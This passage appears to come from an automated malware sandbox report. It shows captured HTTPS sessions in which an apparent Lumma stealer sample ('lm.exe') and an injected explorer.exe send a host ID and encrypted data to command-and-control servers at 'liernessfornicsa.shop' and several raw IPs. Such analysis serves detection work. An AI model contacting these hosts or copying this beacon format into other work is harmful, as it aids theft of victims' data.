52 34 79 56 44 38 43 2b 6c 49 57 45 Data Ascii: DLgMHdhaFUpi7lPR+wTGNn0KWyBWZO23aHvFJ9Q5SSl9sMwN1FoRD26ze7DDKN87DAdiDWowiP4dQ0kb0D01KXywpSmFYhUiY/JrnOMs0xsAKlN8RhDl22BbpRvgCWUdQazMDahaJSduu3K1whjrVh1rY4xmaLE3cAfIF70ZGCVZgdlw4EYpL1anQ4zvLNMzGD57GG4Mye9gQ50j/Bl9HWWkyDnFYzATfvJq1fvYwwcwO2vgZhTR4yVD8C+lIWE
2024-07-24 17:57:19 UTC	1369	IN	Data Raw: 43 58 4d 53 6a 30 44 66 70 5a 71 6a 66 73 45 6c 6a 5a 39 43 72 74 30 58 68 78 52 30 30 78 6d 6a 57 72 34 52 48 30 35 64 4c 47 35 45 66 42 53 4b 54 74 65 74 30 4f 63 78 7a 7a 33 46 7a 67 75 62 7a 52 61 4e 4f 33 50 54 48 65 5a 47 39 51 56 61 53 56 31 72 4d 51 55 34 56 73 4a 44 77 4f 53 43 72 51 37 4c 4d 63 62 4c 51 4b 33 4f 46 49 55 39 61 5a 38 50 72 56 79 77 44 31 4d 4a 43 53 77 35 42 58 55 53 69 55 72 55 70 64 72 70 50 63 77 39 77 73 49 45 6b 4d 51 61 6d 54 31 77 33 68 48 6f 54 76 30 47 57 6b 68 55 61 33 5a 4b 4f 42 2b 61 42 49 44 6b 39 38 51 45 68 69 4b 44 33 6b 4b 66 77 56 72 54 65 6e 76 56 45 4f 35 50 2b 77 64 63 54 6c 39 73 4f 77 35 71 45 49 4a 45 31 71 4c 62 34 54 76 48 4d 63 37 56 44 70 37 41 48 49 4d 6f 50 35 46 51 35 46 32 77 55 42 39 70 57 6d 41 Data Ascii: CXMSj0DfpZqjfsEljZ9Crt0XhxR00xmjWr4RH05dLG5EfBSKTtet0Ocxzz3FzgubzRaNO3PTHeZG9QVaSV1rMQU4VsJDwOSCrQ7LMcbLQK3OFIU9aZ8PrVywD1MJCSw5BXUSiUrUpdrpPcw9wsIEkMQamT1w3hHoTv0GWkhUa3ZKOB+aBIDk98QEhiKD3kKfwVrTenvVEO5P+wdcTl9sOw5qEIJE1qLb4TvHMc7VDp7AHIMoP5FQ5F2wUB9pWmA
2024-07-24 17:57:19 UTC	1369	IN	Data Raw: 49 68 4e 30 4b 4c 56 35 43 7a 46 4d 63 50 41 44 4a 54 44 46 34 45 35 63 70 39 65 6f 30 4c 6f 53 41 63 4a 66 57 73 37 4b 6e 4d 55 68 51 54 48 36 73 4f 74 4f 63 70 39 6c 59 63 4f 6b 73 45 54 69 7a 4e 36 31 78 76 71 51 50 45 44 57 6b 70 58 59 54 6b 4e 61 68 4b 42 53 74 75 6f 31 75 73 2f 78 53 2f 46 7a 6b 4c 57 6a 52 32 54 65 69 65 66 4d 65 31 49 35 41 39 50 43 55 34 69 4c 30 52 2f 46 4d 49 63 6d 4b 66 62 34 6a 33 48 4d 4d 76 4f 43 70 6a 4c 48 34 51 33 63 64 67 58 34 30 6a 2b 42 31 6c 42 58 47 41 39 43 6e 45 65 67 6b 58 53 35 4a 53 74 4f 64 35 39 6c 59 63 79 6d 38 30 61 6b 48 70 67 6b 51 6d 6a 51 76 78 49 42 77 6c 44 5a 6a 38 45 65 78 65 46 51 4e 4f 6f 33 2b 67 78 78 54 54 49 7a 67 79 4b 78 42 53 44 4d 6e 44 61 47 2b 4e 49 2b 67 52 66 53 68 45 69 64 67 4e 67 Data Ascii: IhN0KLV5CzFMcPADJTDF4E5cp9eo0LoSAcJfWs7KnMUhQTH6sOtOcp9lYcOksETizN61xvqQPEDWkpXYTkNahKBStuo1us/xS/FzkLWjR2TeiefMe1I5A9PCU4iL0R/FMIcmKfb4j3HMMvOCpjLH4Q3cdgX40j+B1lBXGA9CnEegkXS5JStOd59lYcym80akHpgkQmjQvxIBwlDZj8EexeFQNOo3+gxxTTIzgyKxBSDMnDaG+NI+gRfShEidgNg
2024-07-24 17:57:19 UTC	1369	IN	Data Raw: 53 76 31 4f 73 73 77 44 4c 45 78 41 47 52 79 68 4b 48 4d 48 7a 59 55 4b 30 46 39 78 41 66 45 52 46 50 49 52 52 31 57 4a 30 4b 77 65 54 64 34 58 36 65 66 63 58 4b 43 70 4c 4a 48 59 59 39 65 64 59 43 36 6b 44 2b 43 46 74 43 58 6d 6f 79 42 33 67 4b 68 45 44 51 70 39 66 67 4d 4d 55 35 6a 59 6c 43 6e 39 56 61 30 33 70 4e 30 68 37 34 53 76 63 5a 56 51 6c 4f 49 69 39 45 66 78 54 43 48 4a 69 67 31 50 38 31 78 7a 62 47 79 51 57 58 79 42 43 4c 4e 58 76 63 48 75 68 45 38 77 42 53 52 46 39 6d 50 77 31 2f 46 49 5a 44 6d 4f 71 61 36 69 61 47 5a 59 33 73 49 37 58 68 48 5a 46 36 59 4a 45 4a 6f 30 4c 38 53 41 63 4a 58 57 55 36 44 6e 4d 66 69 45 72 52 71 74 48 2f 4c 4d 55 35 7a 73 34 42 6e 38 51 55 69 7a 31 36 30 52 66 69 54 76 51 43 58 45 38 52 49 6e 59 44 59 46 6a 61 42 Data Ascii: Sv1OsswDLExAGRyhKHMHzYUK0F9xAfERFPIRR1WJ0KweTd4X6efcXKCpLJHYY9edYC6kD+CFtCXmoyB3gKhEDQp9fgMMU5jYlCn9Va03pN0h74SvcZVQlOIi9EfxTCHJig1P81xzbGyQWXyBCLNXvcHuhE8wBSRF9mPw1/FIZDmOqa6iaGZY3sI7XhHZF6YJEJo0L8SAcJXWU6DnMfiErRqtH/LMU5zs4Bn8QUiz160RfiTvQCXE8RInYDYFjaB
2024-07-24 17:57:19 UTC	1369	IN	Data Raw: 72 50 63 30 34 78 38 59 46 6b 4d 41 49 69 44 56 77 32 78 44 73 51 2f 59 4a 55 45 39 57 5a 54 63 4d 66 31 6a 4d 42 4e 2b 38 6d 72 56 2b 36 44 72 4f 77 30 4b 48 67 77 50 4c 50 58 4f 66 53 4b 4e 46 2b 67 4a 56 52 31 46 72 4a 41 4a 78 47 49 46 57 32 36 4c 53 36 7a 4c 4b 4d 4d 58 4f 41 70 33 47 46 34 41 33 65 64 38 62 34 67 57 2b 53 46 68 52 45 54 52 32 4e 58 55 57 68 6b 72 62 74 4e 32 74 49 59 67 6b 6a 63 41 4f 32 4a 56 61 68 44 4e 74 32 42 58 72 54 50 41 47 56 6b 42 57 61 44 55 46 66 42 53 4e 54 64 75 73 32 2b 55 78 78 54 33 47 7a 77 69 5a 77 78 2f 4c 64 44 2f 59 43 4b 4d 64 73 43 64 63 54 46 70 74 64 43 4e 2b 48 34 34 45 78 2b 72 44 72 54 6e 4b 66 5a 57 48 41 5a 7a 44 45 34 51 2b 64 64 67 51 35 45 50 77 41 46 52 45 57 6e 34 7a 43 6e 30 5a 67 6b 58 58 71 4e Data Ascii: rPc04x8YFkMAIiDVw2xDsQ/YJUE9WZTcMf1jMBN+8mrV+6DrOw0KHgwPLPXOfSKNF+gJVR1FrJAJxGIFW26LS6zLKMMXOAp3GF4A3ed8b4gW+SFhRETR2NXUWhkrbtN2tIYgkjcAO2JVahDNt2BXrTPAGVkBWaDUFfBSNTdus2+UxxT3GzwiZwx/LdD/YCKMdsCdcTFptdCN+H44Ex+rDrTnKfZWHAZzDE4Q+ddgQ5EPwAFREWn4zCn0ZgkXXqN
2024-07-24 17:57:19 UTC	180	IN	Data Raw: 4b 38 36 41 50 4b 62 6a 48 59 30 2f 65 4d 39 53 7a 55 37 6b 44 78 38 48 45 57 4e 32 58 45 46 59 79 67 54 6e 36 70 72 31 66 70 35 39 2b 4d 51 4d 6c 73 6f 4d 6d 6e 64 52 32 42 62 6d 51 75 42 4b 63 55 4a 46 61 33 5a 4b 4f 42 37 43 48 49 6a 71 6d 75 6b 76 68 6d 57 64 6c 56 6e 4e 6e 6b 33 62 61 47 43 52 43 61 4e 54 73 46 41 4e 42 78 46 2b 64 6c 77 34 58 34 46 57 79 71 4c 5a 2b 7a 32 42 41 2f 50 45 46 4a 58 43 45 59 6f 45 51 66 45 64 34 6b 62 2b 53 6d 35 66 58 48 77 31 41 58 38 6d 76 45 72 66 73 4e 33 6a 4f 4d 5a 39 67 34 63 4e 32 4a 0d 0a Data Ascii: K86APKbjHY0/eM9SzU7kDx8HEWN2XEFYygTn6pr1fp59+MQMlsoMmndR2BbmQuBKcUJFa3ZKOB7CHIjqmukvhmWdlVnNnk3baGCRCaNTsFANBxF+dlw4X4FWyqLZ+z2BA/PEFJXCEYoEQfEd4kb+Sm5fXHw1AX8mvErfsN3jOMZ9g4cN2J
2024-07-24 17:57:19 UTC	1369	IN	Data Raw: 32 34 38 36 0d 0a 55 6a 79 33 49 2f 34 46 36 6a 58 62 42 51 48 33 78 53 59 6a 67 44 62 67 6e 50 5a 38 36 70 31 65 59 2f 68 6e 4f 4e 77 55 4c 41 6e 56 54 4c 50 6d 36 66 53 4c 4d 58 71 31 30 4d 48 67 45 2b 4b 55 70 68 57 4a 51 45 67 50 61 55 72 53 79 47 5a 59 32 41 44 4a 58 4d 47 59 55 35 62 63 30 57 34 46 50 7a 54 32 46 33 63 47 45 39 43 48 55 58 69 58 72 6d 68 64 66 6d 4d 73 73 79 78 76 6b 38 6a 63 34 55 68 54 31 70 7a 6c 43 74 42 66 39 49 42 33 41 52 4a 48 59 37 4e 6c 69 61 42 49 44 6b 37 2b 34 77 79 44 72 62 31 6b 2b 35 77 42 47 48 4e 33 44 55 55 4b 30 46 39 6b 67 48 47 52 38 73 4d 68 55 34 51 4e 49 57 67 2f 47 4a 75 6d 36 55 49 6f 50 65 51 6f 36 4e 51 74 6c 30 50 38 31 51 75 77 57 33 43 30 31 62 56 32 38 67 42 7a 38 6d 76 47 66 50 73 74 44 32 66 4f 41 Data Ascii: 2486Ujy3I/4F6jXbBQH3xSYjgDbgnPZ86p1eY/hnONwULAnVTLPm6fSLMXq10MHgE+KUphWJQEgPaUrSyGZY2ADJXMGYU5bc0W4FPzT2F3cGE9CHUXiXrmhdfmMssyxvk8jc4UhT1pzlCtBf9IB3ARJHY7NliaBIDk7+4wyDrb1k+5wBGHN3DUUK0F9kgHGR8sMhU4QNIWg/GJum6UIoPeQo6NQtl0P81QuwW3C01bV28gBz8mvGfPstD2fOA
2024-07-24 17:57:19 UTC	1369	IN	Data Raw: 70 37 4f 57 73 56 36 65 5a 39 49 73 77 75 77 44 45 34 4a 43 54 78 6b 58 79 31 4c 31 52 53 4b 75 35 54 30 66 74 42 39 6c 5a 56 4d 32 4e 39 61 30 33 6f 34 33 41 4c 78 51 2f 4d 65 58 41 35 76 55 68 41 48 61 52 4b 6a 53 63 69 6a 35 4e 4d 72 78 54 50 44 77 42 53 4a 6a 56 54 4c 4e 54 2b 48 4b 61 4d 4e 76 41 35 63 58 78 46 54 65 45 52 67 57 4e 6f 45 37 61 66 55 34 7a 6e 51 4c 49 44 68 41 59 6e 48 4f 34 59 71 65 4a 39 65 6f 30 4f 77 55 41 77 48 45 57 67 6e 52 43 42 49 30 42 2b 4e 39 34 32 39 62 4e 6c 7a 31 49 63 55 32 4a 56 49 78 58 70 74 6e 30 69 6a 41 76 4d 61 54 55 39 53 65 6a 56 44 52 69 61 33 52 39 61 71 33 66 73 4c 78 53 7a 4f 78 77 6d 6d 38 7a 75 46 4d 58 6a 54 42 74 31 37 78 51 74 52 52 31 5a 36 4a 30 51 32 57 49 30 45 67 4a 32 61 70 58 37 35 63 34 33 66 Data Ascii: p7OWsV6eZ9IswuwDE4JCTxkXy1L1RSKu5T0ftB9lZVM2N9a03o43ALxQ/MeXA5vUhAHaRKjScij5NMrxTPDwBSJjVTLNT+HKaMNvA5cXxFTeERgWNoE7afU4znQLIDhAYnHO4YqeJ9eo0OwUAwHEWgnRCBI0B+N9429bNlz1IcU2JVIxXptn0ijAvMaTU9SejVDRia3R9aq3fsLxSzOxwmm8zuFMXjTBt17xQtRR1Z6J0Q2WI0EgJ2apX75c43f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.10	49783	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:20 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:20 UTC	1122	OUT	Data Raw: 6f 32 46 76 71 70 63 6f 31 42 46 74 79 77 64 44 4f 5a 33 79 55 4b 51 4e 4f 39 43 7a 36 52 5a 34 39 76 34 55 2f 2b 44 7a 76 53 4f 74 6a 59 37 75 35 64 78 74 44 41 49 66 2f 6d 65 45 44 67 71 58 39 2b 31 65 50 34 57 31 67 4f 39 66 4c 59 63 6a 47 76 66 67 34 68 74 57 5a 31 6b 52 6f 46 4a 36 6c 6b 33 50 72 70 6e 39 44 6b 51 65 46 69 33 45 61 4e 2f 79 4c 75 55 49 6e 62 6b 4b 30 4c 70 56 47 70 4f 4e 44 49 79 57 37 73 66 74 4a 6a 45 6a 7a 77 67 53 64 79 4e 71 68 7a 4c 56 4a 67 44 74 69 46 5a 70 79 41 38 63 70 77 58 73 6d 55 62 35 4c 55 52 70 59 6d 47 49 36 6b 4f 6e 75 5a 38 59 58 65 55 57 72 4d 31 63 6c 7a 77 4c 2b 73 4d 44 6d 37 75 72 6e 4c 75 4a 57 76 6e 4a 72 74 6a 75 42 4a 44 4b 43 68 34 63 6d 6d 53 6d 53 70 68 50 7a 66 31 34 37 32 75 32 4d 53 61 39 57 51 6d Data Ascii: o2Fvqpco1BFtywdDOZ3yUKQNO9Cz6RZ49v4U/+DzvSOtjY7u5dxtDAIf/meEDgqX9+1eP4W1gO9fLYcjGvfg4htWZ1kRoFJ6lk3Prpn9DkQeFi3EaN/yLuUInbkK0LpVGpONDIyW7sftJjEjzwgSdyNqhzLVJgDtiFZpyA8cpwXsmUb5LURpYmGI6kOnuZ8YXeUWrM1clzwL+sMDm7urnLuJWvnJrtjuBJDKCh4cmmSmSphPzf1472u2MSa9WQm
2024-07-24 17:57:21 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:21 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:21 UTC	685	IN	Data Raw: 4f 61 6a 58 76 4f 57 4a 79 4b 6e 57 65 35 44 62 44 37 31 4f 46 75 6b 64 49 31 36 4c 38 59 47 65 47 7a 68 63 59 50 49 43 79 72 47 54 37 76 34 4f 39 6a 59 4f 44 68 6d 57 5a 6d 47 61 5a 51 42 30 68 4c 64 65 77 75 55 65 6b 6a 4a 76 5a 37 78 58 74 34 38 30 69 76 4c 50 71 4b 71 47 36 35 34 79 4c 73 6e 39 44 71 46 33 74 66 72 66 35 4f 67 7a 34 44 72 55 67 53 76 54 54 62 65 38 33 4d 61 6f 37 6d 71 7a 59 4e 4c 30 49 73 45 35 53 4e 72 48 69 78 74 48 63 75 42 59 44 62 4d 67 49 6b 46 41 72 4d 30 44 71 5a 31 41 76 6c 6c 62 55 66 64 41 64 69 62 4e 32 66 70 72 64 33 30 73 30 44 53 38 51 45 63 62 51 62 57 6b 4b 64 6d 55 49 6d 66 53 79 55 38 34 35 6b 32 77 6a 65 51 71 4e 73 69 62 73 64 42 64 77 6c 4e 45 62 4f 31 34 64 37 68 45 63 42 4c 4a 73 2b 4f 72 34 33 4b 56 42 77 69 Data Ascii: OajXvOWJyKnWe5DbD71OFukdI16L8YGeGzhcYPICyrGT7v4O9jYODhmWZmGaZQB0hLdewuUekjJvZ7xXt480ivLPqKqG654yLsn9DqF3tfrf5Ogz4DrUgSvTTbe83Mao7mqzYNL0IsE5SNrHixtHcuBYDbMgIkFArM0DqZ1AvllbUfdAdibN2fprd30s0DS8QEcbQbWkKdmUImfSyU845k2wjeQqNsibsdBdwlNEbO14d7hEcBLJs+Or43KVBwi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.10	49785	172.67.213.85	443	7864	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:22 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12842 Host: liernessfornicsa.shop
2024-07-24 17:57:22 UTC	12842	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-24 17:57:22 UTC	808	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rldqu6ob8i9egpl365l1sc4862; expires=Sun, 17-Nov-2024 11:44:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BoSS27OJoNGnAFA8FEy3%2FQccasKYuufmzvESVxzYEmM6BqFFaVkoZEpmtEPmrd5j%2FJhNaSd2BeKb1jOaByyFnRAWjc21DRv4weow%2Bca9SV7cjYzEdIfv%2BPTnTABfbSePjkhfSjiymuA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85cacd6ed142ab-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:57:22 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 17:57:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.10	49786	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:22 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:22 UTC	1122	OUT	Data Raw: 45 7a 58 39 4d 4b 45 6c 55 47 39 49 78 53 34 63 67 39 68 53 6c 61 5a 71 6e 6f 71 46 68 58 49 66 45 79 69 42 35 6e 36 69 6f 2f 4f 70 31 34 57 45 57 73 63 5a 56 53 37 32 39 42 54 64 36 56 56 68 6e 55 45 57 4b 61 4e 4c 6d 6d 65 75 38 42 36 56 4b 77 35 4c 68 35 32 73 6c 32 73 54 45 46 36 43 49 79 30 43 61 73 75 77 32 76 53 77 68 70 55 34 45 76 56 63 4b 70 38 65 39 4e 69 79 76 5a 51 38 4f 4b 6a 37 2f 67 72 70 2b 41 57 54 65 30 76 5a 33 41 31 75 72 42 68 30 55 64 56 37 72 6e 50 6b 4f 78 30 72 53 6d 68 75 58 58 79 79 2f 32 42 2b 37 42 76 48 4b 43 32 47 56 53 39 30 66 4d 35 66 34 2b 39 77 41 58 4a 37 31 4c 57 52 68 2f 41 57 77 74 50 4e 6b 6b 74 4b 62 51 6f 6a 6c 69 42 64 53 36 52 68 52 44 61 6a 6d 6e 4f 55 56 59 67 57 44 70 68 35 4c 52 70 73 78 43 78 6b 52 51 79 Data Ascii: EzX9MKElUG9IxS4cg9hSlaZqnoqFhXIfEyiB5n6io/Op14WEWscZVS729BTd6VVhnUEWKaNLmmeu8B6VKw5Lh52sl2sTEF6CIy0Casuw2vSwhpU4EvVcKp8e9NiyvZQ8OKj7/grp+AWTe0vZ3A1urBh0UdV7rnPkOx0rSmhuXXyy/2B+7BvHKC2GVS90fM5f4+9wAXJ71LWRh/AWwtPNkktKbQojliBdS6RhRDajmnOUVYgWDph5LRpsxCxkRQy
2024-07-24 17:57:23 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:23 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:23 UTC	685	IN	Data Raw: 45 49 58 48 77 7a 48 6c 68 68 43 49 56 6b 54 78 68 53 34 77 2f 59 44 4b 75 30 62 39 74 45 73 4b 6c 2f 47 65 76 2b 6d 67 58 5a 4a 69 76 68 56 53 4b 74 6f 61 54 74 69 71 72 44 70 56 77 5a 45 4b 72 58 46 6f 6e 56 6a 57 6b 2b 49 4b 6e 63 78 44 33 31 46 34 75 61 55 67 62 74 6a 71 70 43 49 54 55 42 77 32 51 74 48 72 31 74 77 66 49 6d 57 35 6a 4c 73 47 44 62 4e 78 43 63 58 2f 56 58 67 65 33 69 6f 39 6c 7a 43 67 45 45 2f 4b 71 73 43 38 76 45 2b 55 50 38 65 4c 61 56 43 6d 48 4f 32 71 4f 6c 48 32 2b 46 4e 6b 34 76 65 6d 62 34 58 47 32 4e 6e 2b 6b 4d 36 43 31 30 2b 77 4e 6e 56 66 65 6f 43 5a 48 4c 46 55 59 71 72 79 61 61 44 49 6d 74 56 6a 6e 44 41 70 5a 41 58 33 54 4c 55 42 57 2b 41 53 64 76 4f 32 7a 74 34 59 55 4a 58 30 61 36 79 70 37 7a 37 59 79 58 32 62 46 71 77 Data Ascii: EIXHwzHlhhCIVkTxhS4w/YDKu0b9tEsKl/Gev+mgXZJivhVSKtoaTtiqrDpVwZEKrXFonVjWk+IKncxD31F4uaUgbtjqpCITUBw2QtHr1twfImW5jLsGDbNxCcX/VXge3io9lzCgEE/KqsC8vE+UP8eLaVCmHO2qOlH2+FNk4vemb4XG2Nn+kM6C10+wNnVfeoCZHLFUYqryaaDImtVjnDApZAX3TLUBW+ASdvO2zt4YUJX0a6yp7z7YyX2bFqw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.10	49787	172.67.213.85	443	7864	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:24 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15069 Host: liernessfornicsa.shop
2024-07-24 17:57:24 UTC	15069	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-24 17:57:24 UTC	806	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=asihppcspti2mu2itsls1866jc; expires=Sun, 17-Nov-2024 11:44:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKbnzXbZ5k7tJu8i8CNpNgpVqnL2h1VqBvxQHzRaiXfEZaYbPndsvMe55bZlXp7ngGJBohBhU%2BuJF0zifinFFolib0Bq3jGRniKLhfz3jyO1cdEWt4miajJhBYPI%2FGMq%2BcWZHJbISCc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85cad9ac267288-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:57:24 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 17:57:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.10	49788	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:24 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:24 UTC	1122	OUT	Data Raw: 4e 57 72 41 4b 34 7a 42 52 43 4d 66 4e 31 62 43 50 71 71 71 55 32 2b 69 7a 70 78 58 79 70 73 36 42 75 38 57 38 4a 77 32 39 4a 45 54 53 64 36 76 31 4f 55 68 5a 2b 65 70 6e 2f 4c 4d 72 41 51 57 47 6c 79 67 33 4a 76 52 48 38 4e 77 39 74 49 63 72 59 74 4d 4a 42 2f 72 7a 4b 37 6d 64 4f 58 33 5a 77 69 4a 35 78 66 66 39 67 64 31 2f 54 2f 42 41 57 75 34 6f 68 4d 64 56 65 61 6d 7a 32 4a 43 68 43 45 77 56 4a 6b 76 77 30 58 55 55 4e 64 53 64 42 49 4d 69 6e 41 4e 4c 66 45 4b 34 6d 53 47 6b 56 71 48 4e 66 34 62 2f 50 67 65 4f 57 66 4d 57 36 61 6e 72 66 41 39 64 56 4c 45 46 65 50 67 48 67 6f 77 56 38 58 46 62 72 46 42 47 59 58 45 32 47 47 46 78 78 6d 36 6f 49 58 65 6b 4e 4a 31 71 36 4a 73 59 39 4a 58 30 5a 75 4a 58 7a 4a 69 5a 7a 57 41 30 42 75 34 30 33 69 31 30 54 6a Data Ascii: NWrAK4zBRCMfN1bCPqqqU2+izpxXyps6Bu8W8Jw29JETSd6v1OUhZ+epn/LMrAQWGlyg3JvRH8Nw9tIcrYtMJB/rzK7mdOX3ZwiJ5xff9gd1/T/BAWu4ohMdVeamz2JChCEwVJkvw0XUUNdSdBIMinANLfEK4mSGkVqHNf4b/PgeOWfMW6anrfA9dVLEFePgHgowV8XFbrFBGYXE2GGFxxm6oIXekNJ1q6JsY9JX0ZuJXzJiZzWA0Bu403i10Tj
2024-07-24 17:57:25 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:25 GMT Content-Type: text/plain; charset=utf-8 Connection: close
